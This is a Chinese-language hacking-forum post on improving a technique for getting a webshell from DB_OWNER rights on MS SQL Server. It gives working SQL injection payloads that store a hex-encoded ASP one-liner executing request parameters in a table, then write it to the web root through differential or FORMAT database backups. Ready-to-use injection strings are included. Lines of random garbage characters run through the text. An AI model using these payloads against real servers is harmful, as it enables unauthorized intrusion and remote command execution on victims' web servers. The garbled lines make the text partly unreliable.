DB_OWNER权限得到webshell的改进办法

admin

DB_OWNER权限得到webshell的两点改进:
; E4 |) Q7 U+ _9 o- M' l& ]
" c5 P: [& K3 C+ ?' @" }6 J减少备份文件大小，得到可执行的webshell成功率提高不少
一利用差异备份
加一个参数WITH DIFFERENTIAL

+ G) O. x& h  n1
0 Q. E- t8 i# i6 |7 e; @# r* h# `2
2 E( R4 u/ G, h' n; F3
4
2 i4 y, K! r' U! U. ], h% J declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
8 B) o* U/ \9 @2 Qcreate table [dbo].[xiaolu] ([cmd] [image]);
: o& T; F" R! d4 F4 }+ Dinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
1 }# k9 q1 E; u3 e' y- v& Q
6 F3 O  p7 ]3 Y4 v二利用完全FORMAT
* ?  \: R# X7 M: M加一个参数WITH FROMAT
+ S7 P* {0 `* S1 c+ K! R) A有些页面对数据库要执行几次，而备份又默认是每次都以追加的方式，如果一个注入点对数据库有几次操作，而备份的文件就 几倍的增加，所以

+ V" k  m7 z1 G& U5 E) w1
8 m: e( ~" P; n' \: I- n7 x8 G2
3
4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
  V8 ~5 ?1 P( N. ^create table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
9 C0 e0 P, y; O, M$ D1 ]4 }. \declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT

总的来说就是那么简单几句,下面以备份数据库model为例子
1
4 y) W2 K# E+ I" \4 P
9 T# C/ ^6 Y9 I* D4 Y1 U; }1 P1
( p4 }6 n9 c& o3 Z) B id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')

3 H/ u- F/ V% v2

2 o' A9 b+ j1 [1
id=1;backup database model to disk='你的路径‘ with differential,format;--
" u( h% Q9 ?+ n6 I* y3 \